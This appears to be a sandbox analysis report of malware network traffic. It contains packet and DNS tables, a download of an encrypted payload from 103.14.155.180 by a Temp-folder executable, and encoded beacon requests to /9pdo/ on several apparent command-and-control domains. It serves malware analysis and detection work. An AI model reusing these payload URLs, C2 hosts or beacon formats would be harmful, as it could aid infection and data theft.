                                                                      Apr 16, 2024 17:17:37.427170992 CEST4974580192.168.2.4219.94.128.41
                                                                      Apr 16, 2024 17:17:38.445324898 CEST4974680192.168.2.4219.94.128.41
                                                                      Apr 16, 2024 17:17:38.719130993 CEST8049746219.94.128.41192.168.2.4
                                                                      Apr 16, 2024 17:17:38.719352007 CEST4974680192.168.2.4219.94.128.41
                                                                      Apr 16, 2024 17:17:38.720685005 CEST4974680192.168.2.4219.94.128.41
                                                                      Apr 16, 2024 17:17:38.992697954 CEST8049746219.94.128.41192.168.2.4
                                                                      Apr 16, 2024 17:17:39.027257919 CEST8049746219.94.128.41192.168.2.4
                                                                      Apr 16, 2024 17:17:39.075516939 CEST8049746219.94.128.41192.168.2.4
                                                                      Apr 16, 2024 17:17:39.075552940 CEST8049746219.94.128.41192.168.2.4
                                                                      Apr 16, 2024 17:17:39.075759888 CEST4974680192.168.2.4219.94.128.41
                                                                      Apr 16, 2024 17:17:39.078169107 CEST4974680192.168.2.4219.94.128.41
                                                                      Apr 16, 2024 17:17:39.351284981 CEST8049746219.94.128.41192.168.2.4
                                                                      Apr 16, 2024 17:17:44.526437044 CEST4974780192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:44.738598108 CEST804974781.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:44.738687038 CEST4974780192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:44.740124941 CEST4974780192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:44.951935053 CEST804974781.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:44.952512980 CEST804974781.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:44.952528000 CEST804974781.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:44.952687025 CEST4974780192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:46.255310059 CEST4974780192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:47.273850918 CEST4974880192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:47.487150908 CEST804974881.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:47.487390995 CEST4974880192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:47.488965034 CEST4974880192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:47.701905966 CEST804974881.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:47.702028036 CEST804974881.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:47.702538013 CEST804974881.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:47.702610016 CEST4974880192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:49.005400896 CEST4974880192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:50.023248911 CEST4974980192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:50.237149954 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.238363028 CEST4974980192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:50.239228964 CEST4974980192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:50.452877045 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.452938080 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.452971935 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.453003883 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.453036070 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.453068018 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.453104973 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.453140020 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.453331947 CEST804974981.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:50.453386068 CEST4974980192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:51.755377054 CEST4974980192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:52.773525000 CEST4975080192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:52.986831903 CEST804975081.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:52.987032890 CEST4975080192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:52.988706112 CEST4975080192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:53.201710939 CEST804975081.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:53.201888084 CEST804975081.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:53.202085018 CEST804975081.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:53.202261925 CEST4975080192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:53.204134941 CEST4975080192.168.2.481.88.63.46
                                                                      Apr 16, 2024 17:17:53.417567015 CEST804975081.88.63.46192.168.2.4
                                                                      Apr 16, 2024 17:17:58.517977953 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:17:58.699419022 CEST804975166.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:17:58.699563980 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:17:58.706362963 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:17:58.890928984 CEST804975166.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:17:58.903675079 CEST804975166.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:17:58.903695107 CEST804975166.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:17:58.906775951 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:00.213960886 CEST4975180192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:01.585314035 CEST4975280192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:01.770210028 CEST804975266.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:18:01.770303011 CEST4975280192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:01.771581888 CEST4975280192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:01.949722052 CEST804975266.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:18:01.963171005 CEST804975266.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:18:01.963191032 CEST804975266.29.135.159192.168.2.4
                                                                      Apr 16, 2024 17:18:01.963234901 CEST4975280192.168.2.466.29.135.159
                                                                      Apr 16, 2024 17:18:03.286710024 CEST4975280192.168.2.466.29.135.159

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 16, 2024 17:16:59.170424938 CEST5833053192.168.2.41.1.1.1
                                                                      Apr 16, 2024 17:16:59.912180901 CEST53583301.1.1.1192.168.2.4
                                                                      Apr 16, 2024 17:17:15.540199995 CEST4919853192.168.2.41.1.1.1
                                                                      Apr 16, 2024 17:17:15.768779993 CEST53491981.1.1.1192.168.2.4
                                                                      Apr 16, 2024 17:17:29.415472984 CEST5333453192.168.2.41.1.1.1
                                                                      Apr 16, 2024 17:17:30.015701056 CEST53533341.1.1.1192.168.2.4
                                                                      Apr 16, 2024 17:17:44.086180925 CEST4925553192.168.2.41.1.1.1
                                                                      Apr 16, 2024 17:17:44.524148941 CEST53492551.1.1.1192.168.2.4
                                                                      Apr 16, 2024 17:17:58.214392900 CEST5860253192.168.2.41.1.1.1
                                                                      Apr 16, 2024 17:17:58.514955044 CEST53586021.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Apr 16, 2024 17:16:59.170424938 CEST192.168.2.41.1.1.10x3facStandard query (0)www.ejbodyart.comA (IP address)IN (0x0001)false
                                                                      Apr 16, 2024 17:17:15.540199995 CEST192.168.2.41.1.1.10x844aStandard query (0)www.jt-berger.storeA (IP address)IN (0x0001)false
                                                                      Apr 16, 2024 17:17:29.415472984 CEST192.168.2.41.1.1.10xbd7fStandard query (0)www.n-benriya002.comA (IP address)IN (0x0001)false
                                                                      Apr 16, 2024 17:17:44.086180925 CEST192.168.2.41.1.1.10x15f9Standard query (0)www.scwspark.comA (IP address)IN (0x0001)false
                                                                      Apr 16, 2024 17:17:58.214392900 CEST192.168.2.41.1.1.10x1c7dStandard query (0)www.eternalsunrise.xyzA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Apr 16, 2024 17:16:59.912180901 CEST1.1.1.1192.168.2.40x3facNo error (0)www.ejbodyart.comejbodyart.comCNAME (Canonical name)IN (0x0001)false
                                                                      Apr 16, 2024 17:16:59.912180901 CEST1.1.1.1192.168.2.40x3facNo error (0)ejbodyart.com112.175.50.218A (IP address)IN (0x0001)false
                                                                      Apr 16, 2024 17:17:15.768779993 CEST1.1.1.1192.168.2.40x844aNo error (0)www.jt-berger.store217.160.0.183A (IP address)IN (0x0001)false
                                                                      Apr 16, 2024 17:17:30.015701056 CEST1.1.1.1192.168.2.40xbd7fNo error (0)www.n-benriya002.comn-benriya002.comCNAME (Canonical name)IN (0x0001)false
                                                                      Apr 16, 2024 17:17:30.015701056 CEST1.1.1.1192.168.2.40xbd7fNo error (0)n-benriya002.com219.94.128.41A (IP address)IN (0x0001)false
                                                                      Apr 16, 2024 17:17:44.524148941 CEST1.1.1.1192.168.2.40x15f9No error (0)www.scwspark.com81.88.63.46A (IP address)IN (0x0001)false
                                                                      Apr 16, 2024 17:17:58.514955044 CEST1.1.1.1192.168.2.40x1c7dNo error (0)www.eternalsunrise.xyz66.29.135.159A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • 103.14.155.180
                                                                      • www.ejbodyart.com
                                                                      • www.jt-berger.store
                                                                      • www.n-benriya002.com
                                                                      • www.scwspark.com
                                                                      • www.eternalsunrise.xyz

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449736103.14.155.180807908C:\Users\user\AppData\Local\Temp\Untapestried.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:16:35.011692047 CEST176OUTGET /CkkRLCTUxW193.bin HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                      Host: 103.14.155.180
                                                                      Cache-Control: no-cache
                                                                      Apr 16, 2024 17:16:35.416344881 CEST1289INHTTP/1.1 200 OK
                                                                      Content-Type: application/octet-stream
                                                                      Last-Modified: Tue, 16 Apr 2024 13:40:35 GMT
                                                                      Accept-Ranges: bytes
                                                                      ETag: "9fb619a9390da1:0"
                                                                      Server: Microsoft-IIS/8.5
                                                                      Date: Tue, 16 Apr 2024 15:16:35 GMT
                                                                      Content-Length: 270400
                                                                      Data Raw: c7 ff 05 62 88 b8 55 e2 cc 87 95 00 03 b1 d6 4f ee 4d 8f bd 7e da e3 3e 7f 01 47 69 01 76 a3 b1 9b 05 85 13 3a db 60 d8 d2 df d7 dc 95 70 bd 81 a0 48 61 a7 d5 74 bd d7 72 0a e5 7a b1 34 97 2b 7f 51 a8 69 0e f5 cc 23 8b d3 5c c3 21 db e7 56 d5 06 97 32 cd 0d 98 12 4c 56 ce d4 24 99 7e 93 59 5e ae d0 da 4d d7 f1 19 4a a7 db 00 42 0f f5 5f 6c 8c fa e8 7b e9 5d 1d 0f d3 63 35 09 1c 52 c3 16 ed ad e1 49 84 6b 83 88 d9 86 73 3f 03 9d bf a4 cd 7b f2 96 08 96 65 69 09 fb 50 32 0e b4 6c 42 c8 e4 15 44 b9 dd 8d fb 11 34 97 5d c2 46 11 ea 29 f8 c3 e5 2e c6 51 4e a9 f1 17 d2 a1 fd 28 23 8e 4a 21 b1 0b 70 41 4e ed 6a ea 19 cf dd a5 9c 05 67 5b 35 02 99 28 c7 61 a6 1d dd 17 4b f1 e4 67 b5 c1 dc 6a 78 8c 71 55 84 ad 7e 05 b5 6c d2 b0 a5 31 f5 85 5c d4 3b 31 26 d7 cb 3f 5d 1f b6 7f cc 9a 45 80 56 16 31 68 9a 66 89 a3 f9 09 6b ad 2c 89 c1 c0 6d e6 cc 48 e9 3b 7d 22 89 69 04 58 11 b7 dd 8a 6d 3b 86 dd 89 8a c8 cb ca 50 27 60 a3 3d 8c 70 cf be 04 47 ac 52 d0 ca fa 82 3a f2 35 e3 4d ba ef a3 d0 5d 60 97 6c 38 70 73 ef fe 63 19 c2 75 88 15 69 b2 22 71 98 6a 48 c0 45 fa 99 ab e4 21 a0 6b cc e3 f5 ec 70 c1 61 39 f4 d7 12 90 02 50 d8 80 3f 70 54 15 29 1d 6f 87 b6 28 ea de 4f f3 2d ee f9 21 e0 50 34 5c d2 05 0f 83 40 23 a5 5b 7c e3 f8 ca 60 fd a5 ad b7 fc 74 f3 71 2e 13 74 2c e5 81 41 f0 f8 25 e0 e9 46 24 15 24 b4 3d 49 a3 b6 9e 8d fc 9b 63 2e b5 ed 7c ce 11 04 3f 2e d0 aa 6c 1b 75 b9 7d e9 70 1f ed 2a 79 cf 9a 5c 1a 2c 82 78 07 af 2f 65 63 ff fb 6d 59 ee 14 19 bc 9f e8 2b 78 93 5d 2a 4f b8 de 3b f1 df 78 14 6a 1f 77 35 46 46 57 38 dd dd 71 14 33 db 26 2f 21 ee f1 dc 54 45 49 01 a9 19 8c 9e 15 1c 57 f0 d4 27 20 21 d3 08 4e fa 17 e5 88 c7 cf 3a 02 23 18 41 84 41 12 f0 3f b5 1c 85 71 82 aa 78 f6 bb ef fe 6b 3b 48 47 43 d7 16 e6 08 fe 1e 28 38 ec 71 79 ee 5a b5 89 53 2c 9f 03 0f 50 0a 0c cd ff da 13 6c 74 55 7b 8d d0 02 a5 d3 39 09 d8 8e b0 10 96 1c b5 57 87 5b 59 c3 c1 11 26 c9 af d5 20 80 a6 4f ac 7c 9d fc d3 4a ff d1 c6 2e 78 18 ec 4a d5 71 db 76 af f2 da e7 0c e1 1e f8 82 c0 3f fb 1e db fd 9d eb 0e 3c cd c6 6e 1f 3b 93 cc 39 a8 6a a7 4f 03 fe c2 7e a4 8c b1 59 25 4b 58 e6 d6 d2 ca 84 1a e4 57 c3 a1 3a 35 cd 6b a2 55 7c d0 97 ac 09 a1 c6 12 1e 23 11 d6 e7 e0 46 16 91 fb 35 69 73 09 b0 96 42 81 1d 30 bc 4a 39 e3 ec 78 35 4e 16 a5 a1 dc ef c8 47 7d 03 2d ca e9 27 e1 b7 2a b7 0c dd a0 e1 de c2 c2 d9 27 66 63 59 e3 6d d9 08 ab ec 3f 91 2e 66 87 3e d0 89 52 b5 88 4e 2e b8 d4 ef 59 ce d1 ae 21 15 1a 82 2d 17 68 c2 d6 33 eb 78 34 e2 b6 7e 4d 70 65 8d 51 98 cf 9e 0b 43 da 4b bb 85 e0 96 c3 b0 70 51 c5 2a c2 1f 91 bd b1 fa f7 f6 21 e7 31 c9 82 09 64 3c 16 10 36 d8 8b 90 61 8f c5 5e db 09 e0 65 cd 5f 9f 7b 4c 03 6e 84 ab 52 65 1a b2 4f b9 3f de 5b a6 c4 4e 80 36 5b 5d 2c 18 fa b8 53 84 20 6b 5d f7 42 45 a0 75 a9 bd 77 30 99 0f 46 11 74 63 c6 e0 bd de 04 d7 4b 15 cc 50 9c 19 32 65 9f 0a 47 e7 2b b0 94 0a b6 26 66 d8 2e c3 7b 37 d0 b4 e0 2e 58 db c8 70 fc a9 92 41 84 4e dd be 6f d3 d1 f0 99 4e 5b 4a cc c8 ff 11 81 a0 01 f6 f0 e5 bc 3f 3e 71 6e 29 e3 d3 78 68 80 cc 45 a7 3f 23 cf 5a c2 79 94 d5 75 f2 e8 52 d8 5b ca f6 d0 7f 5f 33 16 60 be c8 cc e2 0d 76 12 fd 3f 5f ae 73 f8 a6 2a 43 11 3e 47 87 2f 92 16 bc 67 00 ce 1b 03 e0
                                                                      Data Ascii: bUOM~>Giv:`pHatrz4+Qi#\!V2LV$~Y^MJB_l{]c5RIks?{eiP2lBD4]F).QN(#J!pANjg[5(aKgjxqU~l1\;1&?]EV1hfk,mH;}"iXm;P'`=pGR:5M]`l8pscui"qjHE!kpa9P?pT)o(O-!P4\@#[|`tq.t,A%F$$=Ic.|?.lu}p*y\,x/ecmY+x]*O;xjw5FFW8q3&/!TEIW' !N:#AA?qxk;HGC(8qyZS,PltU{9W[Y& O|J.xJqv?<n;9jO~Y%KXW:5kU|#F5isB0J9x5NG}-'*'fcYm?.f>RN.Y!-h3x4~MpeQCKpQ*!1d<6a^e_{LnReO?[N6[],S k]BEuw0FtcKP2eG+&f.{7.XpANoN[J?>qn)xhE?#ZyuR[_3`v?_s*C>G/g
                                                                      Apr 16, 2024 17:16:35.416461945 CEST1289INData Raw: 30 2a 6b 7a 0a d3 c3 ac 32 1a b2 e4 fe 36 52 21 c5 00 29 01 a5 e9 b6 03 d6 2c 10 69 46 3b 1f 30 51 8a 0b bc f0 25 59 e2 17 a5 2b 93 5a 0f e0 0f c4 39 50 56 4e e3 8f 85 35 51 a9 3d 54 2c 35 22 cf 61 02 7c 54 98 d7 7c 5b 1f 06 57 3a 20 20 08 5e 01
                                                                      Data Ascii: 0*kz26R!),iF;0Q%Y+Z9PVN5Q=T,5"a|T|[W: ^kE!9cF|@AtqguqX1,".<q,d_hM%FVM`HDkuF>(`AL$,0N11emD6/K2;#+(P/:2
                                                                      Apr 16, 2024 17:16:35.416498899 CEST1289INData Raw: 45 93 f6 d2 21 39 63 e7 46 af 10 7c 96 dd a1 11 b9 40 41 15 01 74 71 67 75 71 58 1c bc ac 31 2c 22 2e a6 a8 3c 71 13 2c 08 d8 64 c8 dc 5f 68 13 8c d8 f6 4d db 25 46 56 9f da c5 1c c9 1e 08 a9 99 cc 4d 1c b5 b4 85 60 cc bc 9b f4 c8 e0 8a 48 a0 83
                                                                      Data Ascii: E!9cF|@AtqguqX1,".<q,d_hM%FVM`HDkuF>(`AL$,0N11emD6/K2;#+(P/:2dU+~Y^MJB_l{]cRW0Wo)1\`b56
                                                                      Apr 16, 2024 17:16:35.416537046 CEST1289INData Raw: c1 c4 08 6b 10 ab a7 cd 08 bf ac 75 46 3e f0 28 0c 60 41 4c c6 16 24 2c 30 4e fa 31 c9 f3 f0 31 de 06 65 6d 0a 06 16 aa c7 fc 44 36 2f 4b e8 32 0b ed 3b e6 f5 cc 23 8b 8b df 2b 28 50 2f d5 15 3a 1c 32 ce cc 1b d2 64 55 c6 2b c5 09 7e 93 59 5e ae
                                                                      Data Ascii: kuF>(`AL$,0N11emD6/K2;#+(P/:2dU+~Y^MJB_l{]cRW0Wo)1\`b56f|M#uNQ"l|.y.:aUej2aU!pBF6bFl1\~1&>]$
                                                                      Apr 16, 2024 17:16:35.819684982 CEST1289INData Raw: 00 ea 45 d9 9e dc 24 00 23 5e ab c9 1e 0c 90 7b e7 da 4a 3b 8d b6 ca de a1 c2 77 12 47 be 3a c8 4a 34 db 0a 71 35 5b bb 93 d9 01 ac 03 b3 2b 31 6d 45 14 4f 11 60 48 3b 50 fd 3f 69 38 30 73 cc b3 6a d7 87 cc d3 12 91 de f4 85 4d 9d d0 30 23 cc 75
                                                                      Data Ascii: E$#^{J;wG:J4q5[+1mEO`H;P?i80sjM0#uA1:wy b*E'9P'zeMN@\BL#j!?=0.zo<f4pz.685bs.yPY`|hsc-
                                                                      Apr 16, 2024 17:16:35.819710970 CEST1289INData Raw: d2 a1 fd 51 64 3f 8d 7a b7 0a 74 92 ff 70 12 15 b8 40 31 bc f8 26 5a ec 51 e5 41 fa 14 c8 d6 e7 bf f1 46 bd 07 cc 46 81 67 86 c6 26 59 bf a1 68 9f 9b 46 ec d3 b0 aa b3 95 7a a3 7b 95 19 9f 92 86 3e 5d 04 9c 70 1b d4 5e 77 bf d7 cb 6b 11 4c 48 48
                                                                      Data Ascii: Qd?ztp@1&ZQAFFg&YhFz{>]p^wkLHH<nk2utnzk~vbZGG'Mb_]op%OuCj?qK6~&*~:.O~'>(R?M"1ZYj_ o.$&`py`T,:%m
                                                                      Apr 16, 2024 17:16:35.819722891 CEST1289INData Raw: 2c b8 4d 04 6f e6 cc c3 53 fb 7f 22 89 94 9b f0 10 b7 cd 03 e7 97 a7 d9 89 33 58 eb ca 50 8d ed a3 3d 8e c8 9d b8 04 47 21 1b d0 f7 77 84 3a f2 3a af 8f f3 9a 56 1b 5a ed de 6e 7e fb b5 ca fd 63 1b 42 4c 0c 5d ea 6a de 31 fd 6b 0e 41 bb b4 eb ab
                                                                      Data Ascii: ,MoS"3XP=G!w::VZn~cBL]j1kA]F.6OQ)T+k9T:&E"7dD^#JN`$2A}B.rz1jxJ-1xWlYQ"4:^!8XuX|iAb
                                                                      Apr 16, 2024 17:16:35.819753885 CEST1289INData Raw: 10 68 88 ec fb 46 81 3b f4 d7 ed 40 89 1d 14 05 f6 04 42 ad 10 93 8c bf 41 c1 2b 24 4d 78 e7 2f 10 3e e3 9a 41 b1 5b 48 c3 08 0d e7 20 92 08 fb 73 35 d8 14 07 26 99 0b 9d 32 8b 2a 98 be ed 0c 9e 42 3a 8d c8 69 a4 82 4e 5c a9 31 39 b6 5c 49 ce de
                                                                      Data Ascii: hF;@BA+$Mx/>A[H s5&2*B:iN\19\I`m.MY)>p9KSmYdDN`fl^y&7/3e#i;"\024W(!;4LB]?|UkE%d8ZZNF%sw
                                                                      Apr 16, 2024 17:16:35.819767952 CEST1289INData Raw: 5e 2c 86 cb 9a de fe c5 cf a9 b6 6e 98 02 62 b3 70 1f 60 8e 5d cf 9a 5c 1a 94 87 a6 79 e7 d8 8e a2 05 fe e6 83 2f ff 06 bf 45 9d c6 27 cd 6e ea 14 1d 4f 03 4a 20 3d f8 e1 16 93 3e f1 42 3f b3 d1 5c 7c 5d 3f 56 52 0b 21 56 88 a4 2c 3d be 6c 51 d8
                                                                      Data Ascii: ^,nbp`]\y/E'nOJ =>B?\|]?VR!V,=lQv$;tL ]`N`D*O%5w#S@KRqS,XFH8UU{&Lq'/gatX/""Xi7$tg.1$1&y;ABk0nbOc@{_
                                                                      Apr 16, 2024 17:16:35.819780111 CEST1289INData Raw: 02 7b 58 a4 cc 29 80 5e 19 45 10 87 88 c7 fc e1 bb d1 4f 41 84 72 e4 79 42 4d 91 1e 71 82 aa 78 4e a4 59 40 66 cc a1 86 b9 d4 9d 2c c9 17 01 2b f2 99 9c 3a 56 63 3b 6a 6b db 74 d2 f5 db c8 cd 25 e0 d9 d1 e7 bf d8 7f 4d fb ca d0 d2 7a 88 23 a0 ad
                                                                      Data Ascii: {X)^EOAryBMqxNY@f,+:Vc;jkt%Mz#`hY{&mOE[BqBM%}BF$f(6}'J=W5k|o[mD[s[%90J9[/.,J`&C2R<oh>Ik
                                                                      Apr 16, 2024 17:16:35.819792032 CEST1289INData Raw: 56 e1 d2 5f 49 c3 9c 50 cb 2b 15 55 6f f8 7c 6c 44 9c 88 de c7 b6 d1 46 52 70 19 ec c7 95 70 ae 80 9c 3b bc 6e 00 a6 41 a5 41 3b bc ee 51 a0 a3 2f c0 1a 71 3f 40 9d 4a b0 7f 47 6c a4 e1 e2 47 55 75 b7 6e 21 7a cf 4a 72 c0 a0 cd 2c 58 c0 ca 92 e8
                                                                      Data Ascii: V_IP+Uo|lDFRpp;nAA;Q/q?@JGlGUun!zJr,X@N;;Q"Ts,Dk tK8I$u0OC@Mqk[e;&="^GAi$hF4$2Loehc0amm<O0iZ"d6}


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449738112.175.50.218801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:00.197278976 CEST473OUTGET /9pdo/?jzuh=7Bfls2&edR0hF=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      Host: www.ejbodyart.com
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Apr 16, 2024 17:17:00.489064932 CEST398INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 16 Apr 2024 15:17:00 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      Data Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                                                                      Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
                                                                      Apr 16, 2024 17:17:00.489125967 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449739217.160.0.183801908C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 16, 2024 17:17:15.983711004 CEST749OUTPOST /9pdo/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Host: www.jt-berger.store
                                                                      Origin: http://www.jt-berger.store
                                                                      Referer: http://www.jt-berger.store/9pdo/
                                                                      User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
                                                                      Data Raw: 65 64 52 30 68 46 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 34 68 56 33 39 45 78 32 2f 70 45 76 31 45 53 4e 62 53 74 57 57 55 56 72 52 66 38 4f 48 36 44 43 68 41 76 2f 4c 6b 41 68 6c 62 58 49 33 4a 79 6b 6f 57 53 44 63 58 6b 31 37 46 4a 76 6a 66 42 6b 54 78 44 68 4e 6d 36 6d 2b 37 4b 69 44 39 70 47 77 35 75 31 6b 6c 36 34 66 77 6d 71 74 57 34 71 7a 39 32 53 42 6b 76 63 76 6d 78 6a 41 59 6f 61 43 63 4e 56 38 56 57 38 34 79 58 77 37 76 37 58 74 5a 58 57 68 30 66 47 52 73 6c 73 72 45 45 73 72 46 33 69 30 71 74 34 4d 50 46 2f 30 70 73 4e 74 30 70 79 5a 54 38 49 41 70 77 56 78 54 6a 76 78 51 70 6a 31 51 3d 3d
                                                                      Data Ascii: edR0hF=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0qt4MPF/0psNt0pyZT8IApwVxTjvxQpj1Q==
                                                                      Apr 16, 2024 17:17:16.198116064 CEST558INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Date: Tue, 16 Apr 2024 15:17:16 GMT
                                                                      Server: Apache
                                                                      Content-Encoding: gzip
